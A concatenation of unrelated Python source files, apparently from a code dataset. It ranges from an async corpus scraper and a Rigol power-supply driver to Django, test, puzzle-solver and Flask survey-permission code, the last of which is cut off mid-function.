async def whether_result_found_async(url: str,
**kwargs) -> str:
"""
Whether the page contains results.
:return: first page HTML code if everything is OK.
:exception RuntimeError: if HTTP request was wrong.
:exception ValueError: if the result not found.
"""
logger.debug("Validating that the request is OK")
try:
page_html = (await get_htmls_async(url, **kwargs))[0]
except Exception:
logger.error(f"The request is not correct: {kwargs}")
raise RuntimeError
logger.debug("The request is correct")
logger.debug("Validating that the result exits")
soup = bs4.BeautifulSoup(page_html, 'lxml')
# TODO: сузить круг поиска
content = soup.find('div', {'class': 'content'}).text
res_msg = ('По этому запросу ничего не найдено.' in content or
'No results match the search query.' in content)
if res_msg:
raise ValueError
return page_html
async def does_page_exist_async(url: str,
p_index: int,
first_page: str,
**kwargs) -> str:
"""
Whether a page at the index exists.
It means, the number of the page in 'pager' is equal to expected index.
RNC redirects to the first page if the page at the number doesn't exist.
Here it's assumed, that the request's correct.
:return: last page code if everything is OK.
:exception ValueError: the page doesn't exist.
"""
# indexing starts with 0
start = p_index
start = start * (start >= 0)
stop = p_index + 1
# request's correct → first page exists
if stop == 1:
return first_page
last_page = (await get_htmls_async(url, start, stop, **kwargs))[0]
soup = bs4.BeautifulSoup(last_page, 'lxml')
pager = soup.find('p', {'class': 'pager'})
if pager:
max_page_number = max(
int(page.text)
for page in pager.find_all('a')
if page.text.isdigit()
)
if not max_page_number:
raise ValueError
if max_page_number < stop:
raise ValueError
return last_page
# if there's no pager, but result exists.
# this might happen if expand=full or out=kwic
if last_page == first_page:
raise ValueError
return last_page
async def is_request_correct_async(url: str,
p_count: int,
**kwargs) -> Tuple[str, str]:
"""
Check:
– is the HTTP request correct (means there are no exceptions catch).
– has there been any result.
– does a page at the number exist (
means RNC doesn't redirect to the first page).
:return: first and last pages if everything's OK.
:exception WrongHTTPRequest: HTTP request is wrong.
:exception NoResultFound: no result found.
:exception LastPageDoesntExist: the last page doesn't exist.
"""
logger.debug("Validating that everything is OK")
try:
# to reduce the number of requests
# the two checks are combined into one.
# coro writes logs by itself
first_page = await whether_result_found_async(url, **kwargs)
except ValueError:
logger.error("HTTP request is OK, but no result found")
raise NoResultFound(f"{kwargs}")
except RuntimeError:
logger.error("HTTP request is wrong")
raise WrongHTTPRequest(f"{kwargs}")
logger.debug("HTTP request is correct, result found")
logger.debug("Validating that the last page exists")
try:
last_page = await does_page_exist_async(
url, p_count - 1, first_page, **kwargs)
except ValueError:
logger.error("Everything is OK, but last page doesn't exist")
raise LastPageDoesntExist(f"{kwargs}")
logger.debug("The last page exists")
logger.debug("Validated successfully")
return first_page, last_page
async def fetch_media_file(url: str, # type: ignore
ses: aiohttp.ClientSession,
**kwargs) -> Optional[Union[bytes, int]]:
"""
Coro, getting media content to write.
:return: bytes (media) if everything is OK,
-1 if there's 429 error, None if it is another error.
:exception: all exceptions should be processed here.
"""
worker_name = kwargs.pop('worker_name', '')
try:
resp = await ses.get(url, allow_redirects=True, params=kwargs)
except Exception as e:
logger.error(
f"{e}\n{worker_name}Cannot get "
f"answer from '{url}' with {kwargs}")
return # type: ignore
if resp.status == 200:
content = await resp.read()
resp.close()
return content
elif resp.status == 429:
resp.close()
return -1
logger.error(
f"{resp.status}: {resp.reason} requesting to {resp.url}"
)
resp.close()
async def dump(content: bytes,
filename: str) -> None:
""" Dump content to media file."""
async with aiofiles.open(filename, 'wb') as f:
await f.write(content)
async def worker_fetching_media(worker_name: str,
q_args: asyncio.Queue) -> None:
"""
Worker getting media file and dumping it to file.
Wait some time and request again if there's 429 error.
"""
while True:
url, ses, filename = q_args.get_nowait()
logger.debug(f"{worker_name}Requested to '{url}'")
content = await fetch_media_file(url, ses, worker_name=worker_name)
if content is None:
q_args.task_done()
return
while content == -1:
logger.debug(
f"{worker_name}: 429 'Too many requests', "
f"url: {url}; wait {WAIT}s"
)
await asyncio.sleep(WAIT)
content = await fetch_media_file(url, ses, worker_name=worker_name)
logger.debug(f"{worker_name}Received from '{url}'")
logger.debug(f"{worker_name}Dumping '{url}' to '{filename}'")
await dump(content, filename) # type: ignore
logger.debug(f"{worker_name}'{filename}' dumped")
q_args.task_done()
async def download_docs_coro(url_to_name: List[Tuple[str, str]]) -> None:
""" Coro running 5 workers to download media files. """
timeout = aiohttp.ClientTimeout(WAIT)
q_args = asyncio.Queue(maxsize=-1) # type: ignore
async with aiohttp.ClientSession(timeout=timeout) as ses:
for url, filename in url_to_name:
await q_args.put((url, ses, filename))
tasks = []
for worker_number in range(5):
name = f"Worker-{worker_number + 1}: "
task = asyncio.create_task(
worker_fetching_media(name, q_args))
tasks += [task]
await q_args.join()
for task in tasks:
task.cancel()
def download_docs(url_to_name: List[Tuple[str, str]]) -> None:
"""
Run coro, download the files.
:param url_to_name: list of tuples of str, pairs: url – filename.
"""
logger.info(f"Requested {len(url_to_name)} files to download")
coro_start = time.time()
asyncio.run(download_docs_coro(url_to_name))
logger.info(f"Downloading completed, coro executing time: "
f"{round(time.time() - coro_start, 2)}s")
async def download_docs_async(url_to_name: List[Tuple[str, str]]) -> None:
"""
Run coro, download the files.
:param url_to_name: list of tuples of str, pairs: url – filename.
"""
logger.info(f"Requested {len(url_to_name)} files to download")
coro_start = time.time()
await download_docs_coro(url_to_name)
logger.info(f"Downloading completed, coro executing time: "
f"{round(time.time() - coro_start, 2)}s")
|
python
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .. import ivi
from .. import dcpwr
from .. import scpi
TrackingType = set(['floating'])
TriggerSourceMapping = {
'immediate': 'imm',
'bus': 'bus'}
class rigolBaseDCPwr(scpi.dcpwr.Base, scpi.dcpwr.Trigger, scpi.dcpwr.SoftwareTrigger,
scpi.dcpwr.Measurement):
"Rigol generic IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '')
super(rigolBaseDCPwr, self).__init__(*args, **kwargs)
self._output_count = 3
self._output_spec = [
{
'range': {
'P8V': (8.0, 5.0)
},
'ovp_max': 8.8,
'ocp_max': 5.5,
'voltage_max': 8.0,
'current_max': 5.0
},
{
'range': {
'P30V': (30.0, 2.0)
},
'ovp_max': 33.0,
'ocp_max': 2.2,
'voltage_max': 30.0,
'current_max': 2.0
},
{
'range': {
'N30V': (-30.0, 2.0)
},
'ovp_max': -33.0,
'ocp_max': 2.2,
'voltage_max': -30.0,
'current_max': 2.0
}
]
self._memory_size = 10
self._identity_description = "Rigol generic IVI DC power supply driver"
self._identity_identifier = ""
self._identity_revision = ""
self._identity_vendor = ""
self._identity_instrument_manufacturer = "Rigol Technologies"
self._identity_instrument_model = ""
self._identity_instrument_firmware_revision = ""
self._identity_specification_major_version = 3
self._identity_specification_minor_version = 0
self._identity_supported_instrument_models = ['DP831A', 'DP832', 'DP832A']
self._add_method('memory.save',
self._memory_save)
self._add_method('memory.recall',
self._memory_recall)
self._init_outputs()
def _get_bool_str(self, value):
"""
redefining to change behavior from '0'/'1' to 'off'/'on'
"""
if bool(value):
return 'on'
return 'off'
def _memory_save(self, index):
index = int(index)
if index < 1 or index > self._memory_size:
raise OutOfRangeException()
if not self._driver_operation_simulate:
self._write("*sav %d" % index)
def _memory_recall(self, index):
index = int(index)
if index < 1 or index > self._memory_size:
raise OutOfRangeException()
if not self._driver_operation_simulate:
self._write("*rcl %d" % index)
def _utility_self_test(self):
code = 0
message = "No Response"
if not self._driver_operation_simulate:
self._write("*TST?")
# wait for test to complete
message = self._read()
if 'FAIL' in message:
code = -1
return (code, message)
|
python
|
from maskcnn import training_aux_wrapper
from sys import argv
def main():
dataset, image_subset, neuron_subset, seed, arch_name, opt_name = argv[1:]
training_aux_wrapper.train_one_wrapper(dataset, image_subset, neuron_subset, int(seed), arch_name, opt_name)
if __name__ == '__main__':
main()
|
python
|
import numpy
import unittest
import sycomore
from sycomore.units import *
class TestBloch(unittest.TestCase):
def test_pulse(self):
M = sycomore.bloch.pulse(47*deg, 23*deg)
numpy.testing.assert_almost_equal(
M,
[[ 0.95145043, 0.11437562, 0.28576266, 0. ],
[ 0.11437562, 0.73054793, -0.67321463, 0. ],
[-0.28576266, 0.67321463, 0.68199836, 0. ],
[ 0. , 0. , 0. , 1. ]])
def test_time_interval(self):
M = sycomore.bloch.time_interval(
sycomore.Species(1000*ms, 100*ms, delta_omega=420*Hz), 10*ms)
numpy.testing.assert_almost_equal(
M,
[[ 0.27961014, -0.86055152, 0. , 0. ],
[ 0.86055152, 0.27961014, 0. , 0. ],
[ 0. , 0. , 0.99004983, 0.00995017],
[ 0. , 0. , 0. , 1. ]])
def test_relaxation(self):
M = sycomore.bloch.relaxation(sycomore.Species(1000*ms, 100*ms), 10*ms)
numpy.testing.assert_almost_equal(
M,
[[0.90483742, 0. , 0. , 0. ],
[0. , 0.90483742, 0. , 0. ],
[0. , 0. , 0.99004983, 0.00995017],
[0. , 0. , 0. , 1. ]])
def test_phase_accumulation(self):
M = sycomore.bloch.phase_accumulation(numpy.pi/6*rad)
numpy.testing.assert_almost_equal(
M,
[[ 0.8660254, -0.5 , 0. , 0. ],
[ 0.5 , 0.8660254, 0. , 0. ],
[ 0. , 0. , 1. , 0. ],
[ 0. , 0. , 0. , 1. ]])
if __name__ == "__main__":
unittest.main()
|
python
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from project.tweets.views import TweetsViewset
router = DefaultRouter()
router.register(r"tweets", TweetsViewset, basename="tweets")
urlpatterns = [
path("", include(router.urls)),
]
|
python
|
import random
import names
import csv
from django.template.defaultfilters import slugify
from orcamentos.crm.models import Customer, Person, PhonePerson
from orcamentos.utils.lists import COMPANY_LIST
from orcamentos.utils.gen_random_values import (
gen_cpf,
gen_digits,
gen_phone,
gen_rg,
)
from orcamentos.utils.gen_names import (
gen_female_first_name,
gen_male_first_name,
)
customer_list = []
address_list = []
''' Lendo os dados de clientes_.csv '''
with open('fix/clientes_.csv', 'r') as f:
r = csv.DictReader(f)
for dct in r:
customer_list.append(dct)
f.close()
''' Lendo os dados de enderecos_.csv '''
with open('fix/enderecos_.csv', 'r') as f:
r = csv.DictReader(f)
for dct in r:
address_list.append(dct)
f.close()
REPEAT = len(customer_list) + 8
photo = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'
for i in range(REPEAT):
g = random.choice(['M', 'F'])
if g == 'M':
treatment = gen_male_first_name()['treatment']
first_name = gen_male_first_name()['first_name']
else:
treatment = gen_female_first_name()['treatment']
first_name = gen_female_first_name()['first_name']
last_name = names.get_last_name()
if i < 17:
gender = 'M'
treatment = None
first_name = customer_list[i]['first_name']
last_name = None
company = None
customer_type = customer_list[i]['customer_type']
email = None
else:
gender = g
company = random.choice(COMPANY_LIST)
customer_type = 'p'
email = first_name[0].lower() + '.' + \
last_name.lower() + '@example.com'
if customer_type == 'p':
cpf = gen_cpf()
rg = gen_rg()
cnpj = None
ie = None
else:
cpf = None
rg = None
cnpj = gen_digits(14)
ie = 'isento'
slug = slugify('{} {}'.format(first_name, last_name))
obj = Customer(
person_type='c',
gender=g,
treatment=treatment,
first_name=first_name,
last_name=last_name,
slug=slug,
photo=photo,
company=company,
email=email,
customer_type=customer_type,
cpf=cpf,
rg=rg,
cnpj=cnpj,
ie=ie,
address=address_list[i]['address'],
district=address_list[i]['district'],
city=address_list[i]['city'],
uf=address_list[i]['uf'],
cep=address_list[i]['cep'],
)
obj.save()
# done
'''
Para cada Person incluimos dois telefones:
um principal e um celular
'''
customers = Customer.objects.all()
aux = []
for person in customers:
obj_pri = PhonePerson(
phone=gen_phone(),
person=person,
)
obj = PhonePerson(
phone=gen_phone(),
person=person,
phone_type='cel'
)
aux.append(obj_pri)
aux.append(obj)
PhonePerson.objects.bulk_create(aux)
|
python
|
from urllib.request import urlopen
def get_page_3(url):
pagina = urlopen(url)
codigoHtml = pagina.read().decode('utf')
pagina.close()
return codigoHtml
def get_next_target(website):
start_link= website.find('<a href')
if (start_link) != -1:
start_quote= website.find('"',start_link)
end_quote= website.find('"',start_quote+1)
url= website[start_quote+1:end_quote]
page = website[end_quote+1:]
return url
return start_link
page = get_page_3('http://xkcd.com/353')
while get_next_target(page) != -1 :
url = get_next_target(page)
print (url)
print (page)
|
python
|
/home/runner/.cache/pip/pool/cf/51/25/b749cb02a5396340ce9fda7fffc4272d66af9443a947242291d6202aba
|
python
|
def proc():
str = input()
fp = open('./dict/person.dic', mode='rt', encoding='utf-8')
while True:
line = fp.readline()
if not line:
break
if str in line:
return
fp.close()
fp = open('./dict/person.dic', mode='at', encoding='utf-8')
fp.write('\n%s/NNP' % str)
fp.close()
print('Added!')
while True:
proc()
|
python
|
import numpy as np
import libs.state_node as STTREE
class HillClimbing:
def __init__(self, initialPuzzle, answerPuzzle, k):
self.totalExpansions = 0
self.k = k
self.answerPuzzle = answerPuzzle.puzzle
self.frontier = []
self.frontier.append(
(
STTREE.StateNode(initialPuzzle.puzzle, initialPuzzle.n),
self.manhattanDistance(initialPuzzle.puzzle),
0,
)
)
self.path = []
def manhattanDistance(self, actualPuzzle):
# Calculates the Manhattan Distance: sum of the distances of each piece to it's correct position
totalDist = 0
actualPiece = 1
for x in range(len(actualPuzzle)):
for y in range(len(actualPuzzle[x])):
if not (x == len(actualPuzzle) - 1 and y == len(actualPuzzle[x]) - 1):
actualCoord = np.where(actualPuzzle == actualPiece)
coordX, coordY = actualCoord[0][0], actualCoord[1][0]
totalDist += abs(x - coordX) + abs(y - coordY)
actualPiece += 1
return totalDist
def checkNodeSolution(self, nodePuzzle):
return np.array_equal(nodePuzzle, self.answerPuzzle)
def insertNodeToFrontier(self, node, actualCost):
# If the node action exists
if node:
self.frontier.append(
(node, self.manhattanDistance(node.puzzle), actualCost + 1)
)
def sortFrontier(self):
self.frontier = sorted(self.frontier, key=lambda x: x[1])
def execute(self):
# Initializing the actual distance with the greater possible value
actualDistance = float("inf")
k = self.k
while len(self.frontier) > 0:
self.sortFrontier()
newNode, newDistance, newCost = self.frontier.pop(0)
# If the avaliation function (Manhattan Distance) of the new node is smaller than the old actual node, reset the k for lateral movements
if newDistance < actualDistance:
k = self.k
actualNode, actualDistance, actualCost = newNode, newDistance, newCost
self.path.append(actualNode.puzzle)
elif newDistance == actualDistance:
# If the remaining lateral movements is greater than 0, move laterally and decrease k by 1
if k > 0:
k -= 1
actualNode, actualDistance, actualCost = (
newNode,
newDistance,
newCost,
)
self.path.append(actualNode.puzzle)
# If the remaining lateral movements is 0, return the actual node
else:
return actualNode, self.totalExpansions, actualCost
# If no frontier node is better than then actual one, finish the Hill Climbing and return the actual node
else:
return actualNode, self.totalExpansions, actualCost
if self.checkNodeSolution(actualNode.puzzle):
return actualNode, self.totalExpansions, actualCost
else:
actualNode.expand()
self.totalExpansions += 1
# Clears the frontier to insert the new nodes
self.frontier.clear()
self.insertNodeToFrontier(actualNode.up, actualCost)
self.insertNodeToFrontier(actualNode.down, actualCost)
self.insertNodeToFrontier(actualNode.left, actualCost)
self.insertNodeToFrontier(actualNode.right, actualCost)
# If, for some reason, the solver doesn't found a solution, then return the last actual node as an answer
return actualNode, self.totalExpansions, actualCost
|
python
|
# Generated by Django 3.1.13 on 2021-09-28 03:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('property', '0010_auto_20210928_0430'),
]
operations = [
migrations.AlterField(
model_name='property',
name='property_area',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=20, verbose_name='Area Sq/Ft'),
),
migrations.AlterField(
model_name='property',
name='property_price',
field=models.DecimalField(decimal_places=2, default=0.0, help_text='if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ', max_digits=20, verbose_name='Property Price'),
),
]
|
python
|
from supermarket import Supermarket
from Markov import Get_Entry
entry = Get_Entry()
lidl = Supermarket(name='LIDL', entry = entry)
while lidl.is_open():
# increase the time of the supermarket by one minute
# generate new customers at their initial location
# repeat from step 1
lidl.add_new_customers()
lidl.print_customers()
lidl.next_minute()
# remove churned customers from the supermarket
lidl.remove_exitsting_customers()
|
python
|
"""
Timeseries plots with error bands
=================================
_thumb: .5, .45
"""
import seaborn as sns
sns.set(style="darkgrid")
# Load an example dataset with long-form data
fmri = sns.load_dataset("fmri")
# Plot the responses for different events and regions
sns.lineplot(x="timepoint", y="signal",
hue="region", style="event",
data=fmri)
|
python
|
from typing import Literal, Any, List, Dict
from flask_sqlalchemy import SQLAlchemy
from base64 import b32encode
from flask import session
from globals import *
import xml.etree.ElementTree as ET
import sqlite3
import secrets
import random
import error
import re
import os
db = SQLAlchemy(app)
Role = Literal['s', 'u', 'g']
Permission = Literal['o', 'w', 'r', 'n']
PERMISSION_ORDER = ['n', 'r', 'w', 'o']
class User(db.Model):
__tablename__ = "Users"
id = db.Column(db.Integer, primary_key=True) #: User Id
CasLogin = db.Column(db.String(80), unique=True, nullable=False) #: CAS Login
Pesel = db.Column(db.String(11), nullable=True) #: PESEL number of the user
FetchData = db.Column(db.Boolean, nullable=False) #: No use of this value is implemented yet
Role = db.Column(db.String, default='g', nullable=False) #: The user's role in the system
def as_dict(self):
ud = {
"id": self.id,
"casLogin": self.CasLogin.split('@')[0],
"fetchData": self.FetchData,
"role": self.Role,
"logged": self.Role != 'g',
}
if DEBUG:
ud["debug"] = True
return ud
class Survey(db.Model):
__tablename__ = "Surveys"
id = db.Column(db.Integer, primary_key=True) #: Survey Id
Name = db.Column(db.String(80), nullable=False) #: Title of the survey
AnkieterId = db.Column(db.Integer, unique=True) #: Id of the Survey in USOS Ankieter
StartedOn = db.Column(db.DateTime, nullable=True) #: Start date of the survey
EndsOn = db.Column(db.DateTime, nullable=True) #: End date of the survey
IsActive = db.Column(db.Integer, nullable=True) #: No use of this value is implemented yet
QuestionCount = db.Column(db.Integer, nullable=True) #: Number of questions in the survey
BackgroundImg = db.Column(db.String(50), default=None) #: Filename of the survey's backgroun image in the menu
AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id')) #: Id of the user who created the survey
class Report(db.Model):
__tablename__ = "Reports"
id = db.Column(db.Integer, primary_key=True) #: Report Id
Name = db.Column(db.String(80), nullable=False) #: Title of the report
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), nullable=False) #: Id of the source survey
BackgroundImg = db.Column(db.String(50)) #: Filename of the report's background image in the menu
AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id')) #: Id of the user who created the report
class UserGroup(db.Model):
__tablename__ = "UserGroups"
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)
Group = db.Column(db.String(25), primary_key=True)
class SurveyGroup(db.Model):
__tablename__ = "SurveyGroups"
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True) #: Id of the survey that belongs to a group
Group = db.Column(db.String(25), primary_key=True) #: The name of the group
class ReportGroup(db.Model):
__tablename__ = "ReportGroups"
ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True) #: Id of the report that belongs to a group
Group = db.Column(db.String(25), primary_key=True) #: The name of the group
class SurveyPermission(db.Model):
__tablename__ = "SurveyPermissions"
SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True) #: The Id of the survey the permission is to
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True) #: The Id of the user that holds the permission
Type = db.Column(db.String, default='r', nullable=False) #: The type of the permission
class ReportPermission(db.Model):
__tablename__ = "ReportPermissions"
ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True) #: The Id of the report the permission is to
UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True) #: The Id of the user that holds the permission
Type = db.Column(db.String, default='r', nullable=False) #: The type of the permission
class Link(db.Model):
__tablename__ = "Links"
id = db.Column(db.Integer, primary_key=True) #: Link Id
Salt = db.Column(db.String(SALT_LENGTH)) #: The salt of the link
PermissionType = db.Column(db.String, default='r', nullable=False) #: Perission granted by the link
ObjectType = db.Column(db.String, nullable=False) #: Type of the object the permission is to
ObjectId = db.Column(db.Integer, nullable=False) #: Id of the object the permission is to
ADMIN.add_view(ModelView(User, db.session))
ADMIN.add_view(ModelView(Survey, db.session))
def get_user(login: Any = "") -> User:
"""Get a user object from DB.
:param login: User's CAS login, id or guest if empty string (default: "")
:raises error.API: no such user
:return: User object
:rtype: User
"""
user = None
if not login:
# zamiast tego blędu, jeśli nie ma loginu, to przydziel gościa
if 'username' not in session:
session['username'] = GUEST_NAME
if session['username'] == GUEST_NAME:
return User.query.filter_by(Role='g').first()
login = session['username']
if type(login) is str:
if '@' in login:
user = User.query.filter_by(CasLogin=login).first()
elif re.match("[0-9]+", login):
user = User.query.filter_by(Pesel=login).first()
else:
users = get_all_users()
for u in users["users"]:
if u["casLogin"].split("@")[0] == login:
user = User.query.filter_by(id=u["id"]).first()
if type(login) is int:
user = User.query.filter_by(id=login).first()
if user is None:
raise error.API(f'no such user {login}')
return user
def create_user(cas_login: str, pesel: str, role: str) -> User:
"""Create a new user.
:param cas_login: New user's cas login
:type cas_login: str
:param pesel: New user's PESEL number
:type pesel: str
:param role: New user's role (values: 's','u','g')
:type role: Role
:return: The new user's User object
:rtype: User
"""
user = User(CasLogin=cas_login, Pesel=pesel, Role=role, FetchData=True)
db.session.add(user)
db.session.commit()
return user
def delete_user(user: User):
"""Delete user from Users database and their permissions
from SurveyPermissions and ReportPermissions.
:param user: The user to be deleted
:type user: User
"""
sur_perms = SurveyPermission.query.filter_by(UserId=user.id).all()
rep_perms = ReportPermission.query.filter_by(UserId=user.id).all()
groups = UserGroup.query.filter_by(UserId=user.id).all()
for sp in sur_perms:
db.session.delete(sp)
for rp in rep_perms:
db.session.delete(rp)
for g in groups:
db.session.delete(g)
db.session.delete(user)
db.session.commit()
def get_survey(survey_id: int) -> Survey:
"""Get survey by given id.
:param survey_id: Survey's id
:type survey_id: int
:raises error.API: no such survey
:return: Returns survey
:rtype: Survey
"""
survey = Survey.query.filter_by(id=survey_id).first()
if survey is None:
raise error.API('no such survey')
return survey
def get_report(report_id: int) -> Report:
"""Get report by given id.
:param id: Id of a report
:type id: int
:raises error.API: no such report
:return: Requested report object
:rtype: Report
"""
report = Report.query.filter_by(id=report_id).first()
if report is None:
raise error.API('no such report')
return report
def get_permission_link(permission: Permission, object_type: Literal['s', 'r'], object_id: int) -> str:
"""Create and obtain a permission link.
:param permission: Permission type (values: 'o', 'w', 'r', 'n')
:type permission: Role
:param object_type: Type of the object shared by the link
:type object_type: Literal['s', 'r']
:param object_id: Id of the object
:type object_id: int
:return: A concatenated salt and link id as a string
:rtype: str
"""
link = Link.query.filter_by(PermissionType=permission, ObjectType=object_type, ObjectId=object_id).first()
if link is not None:
return link.Salt + str(link.id)
bits = secrets.randbits(5*SALT_LENGTH)
salt = bits.to_bytes(5*SALT_LENGTH//8+1, byteorder='big')
salt = b32encode(salt).decode('utf-8')[:SALT_LENGTH]
salt = salt.lower()
print(salt)
link = Link(
Salt=salt,
PermissionType=permission,
ObjectType=object_type,
ObjectId=object_id
)
db.session.add(link)
db.session.commit()
return link.Salt + str(link.id)
def set_permission_link(tag: str, user: User):
"""Set permission using link.
:param tag: Salt and id string from the link
:type tag: str
:param user: User that will gain the permission
:type user: User
:return: Returns permission type, object name and object id
:rtype: Permission, object, int
"""
link = get_link_details(tag)
if link is None:
raise error.API('wrong url')
object_type = link.ObjectType
if object_type == 's':
object_name = 'survey'
get_object = get_survey
get_permission = get_survey_permission
set_permission = set_survey_permission
elif object_type == 'r':
object_name = 'report'
get_object = get_report
get_permission = get_report_permission
set_permission = set_report_permission
else:
raise error.API(f'unknown database object type "{object_type}"')
object = get_object(link.ObjectId)
perm = get_permission(object, user)
if PERMISSION_ORDER.index(perm) >= PERMISSION_ORDER.index(link.PermissionType):
return link.PermissionType, object_name, object.id
set_permission(object, user, link.PermissionType, bylink=True)
return link.PermissionType, object_name, object.id
def get_link_details(tag: str) -> Link:
"""Get link details
:param tag: Salt and id string from the link
:type tag: str
:return: Returns a Link object
:rtype: Link
"""
salt = tag[:SALT_LENGTH]
id = int(tag[SALT_LENGTH:])
link = Link.query.filter_by(id=id, Salt=salt).first()
return link
def get_report_users(report: Report) -> dict:
"""Get users having permission to the given report
:param report: The report
:type report: Report
:return: Returns a dict with user ids as keys and their permissions under them
:rtype: dict
"""
perms = ReportPermission.query.filter_by(ReportId=report.id).all()
result = {}
for perm in perms:
result[perm.UserId] = perm.Type
return result
def get_survey_users(survey: Survey) -> dict:
"""Get users having permission to given survey
:param survey: The survey
:type survey: Survey
:return: Returns a dict with user ids as keys and their permissions under them
:rtype: dict
"""
perms = SurveyPermission.query.filter_by(SurveyId=survey.id).all()
result = {}
for perm in perms:
result[perm.UserId] = perm.Type
return result
def get_all_users() -> dict:
"""Get all users
:return: Cas logins and users id.
:rtype: dict
"""
users = User.query.all()
result = []
for u in users:
result.append({
"casLogin": u.CasLogin.split('@')[0],
"id": u.id
})
return {"users": result}
def get_groups() -> List[str]:
"""Get all groups from UserGroups
:return: List of all groups
:rtype: List[str]
"""
user_groups = UserGroup.query.with_entities(UserGroup.Group).distinct()
return [ug.Group for ug in user_groups]
def set_user_group(user: User, group_name: str):
"""Set group for user. If already exists do nothing.
:param user: User
:type user: User
:param group_name: Name of a group
:type group_name: str
"""
user_group = UserGroup.query.filter_by(UserId=user.id, Group=group_name).first()
if user_group is None:
user_group = UserGroup(UserId=user.id, Group=group_name)
db.session.add(user_group)
db.session.commit()
def unset_user_group(user: User, group: str):
"""Unset user from a group.
:param user: User object
:type user: User
:param group: Group name
:type group: str
"""
user_group = UserGroup.query.filter_by(UserId=user.id, Group=group)
if user_group is None:
raise error.API('the user is not in the group')
user_group.delete()
db.session.commit()
def get_user_groups(user: User) -> List[str]:
"""Get all groups for given user
:param user: Given user
:type user: User
:return: List of user's groups names
:rtype: List
"""
user_groups = UserGroup.query.filter_by(UserId=user.id).all()
if user_groups is None:
return []
return [user_group.Group for user_group in user_groups]
def get_user_surveys(user: User) -> List[Survey]:
"""Get surveys for which the user has permissions.
For administrators it returns all surveys.
:param user: User object
:type user: User
:return: List of Survey objects
:rtype: List[Survey]
"""
if user.Role == 's':
return Survey.query.all()
user_surveys = SurveyPermission.query.filter_by(UserId=user.id).all()
surveys = []
for survey in user_surveys:
surveys.append(Survey.query.filter_by(id=survey.SurveyId).first())
if 'surveys' in session:
for id in session['surveys']:
surveys.append(Survey.query.filter_by(id=int(id)).first())
return surveys
def get_user_reports(user: User) -> List[Report]:
"""Get reports for which the user has permissions.
For administrators it returns all reports.
:param user: User object
:type user: User
:return: List of Report objects
:rtype: List[Report]
"""
if user.Role == 's':
return Report.query.all()
user_reports = ReportPermission.query.filter_by(UserId=user.id).all()
reports = []
for report in user_reports:
reports.append(Report.query.filter_by(id=report.ReportId).first())
if 'reports' in session:
for id in session['reports']:
reports.append(Report.query.filter_by(id=int(id)).first())
return reports
def get_group_users(group: str) -> List[User]:
"""Get users assigned to given group.
:param group: Name of a group
:rtype group: str
:return: Returns List of User objects
:rtype: List[User]
"""
user_groups = UserGroup.query.filter_by(Group=group).all()
users = []
for user_group in user_groups:
user = User.query.filter_by(id=user_group.UserId).first()
if user is not None:
users.append(user)
return users
def rename_report(report: Report, name: str):
"""Rename report.
:param report: The Report object
:type report: Report
:param name: New report name
:type name: str
"""
report.Name = name
db.session.commit()
def rename_survey(survey: Survey, name: str):
"""Rename survey.
:param survey: The Survey object
:type survey: Survey
:param name: New survey name
:type name: str
"""
survey.Name = name
db.session.commit()
def delete_group(group: str):
"""Delete a group
:param group: The name of the group
:type group: str
"""
UserGroup.query.filter_by(Group=group).delete()
db.session.commit()
def create_survey(user: User, name: str) -> Survey:
"""Create survey by given user
:param user: The creator of the new survey
:type user: User
:param name: Name of a survey
:type name: str
:return: The object of the new survey
:rtype: Survey
"""
backgrounds = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
survey = Survey(Name=name, QuestionCount=0, AuthorId=user.id, BackgroundImg=random.choice(backgrounds))
db.session.add(survey)
db.session.commit()
set_survey_permission(survey, user, 'o')
return survey
# meta = {"started_on": DateTime, "ends_on": DateTime, "is_active": int}
def set_survey_meta(survey: Survey, name: str, question_count: int, meta: dict):
"""Add meta information of a given survey.
:param survey: The survey to be modified
:type survey: Survey
:param name: The new name of a survey
:type name: int
:param question_count: Number of questions
:type question_count: int
:param meta: Other information (started_on, ends_on, is_active)
:type meta: dict
"""
if survey is None:
survey = Survey(Name=name, QuestionCount=question_count)
db.session.add(survey)
if name:
survey.Name = name
if meta["started_on"]:
survey.StartedOn = meta["started_on"]
if meta["ends_on"]:
survey.EndsOn = meta["ends_on"]
if meta["is_active"]:
survey.IsActive = meta["is_active"]
if survey.BackgroundImg is None:
bkgs = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
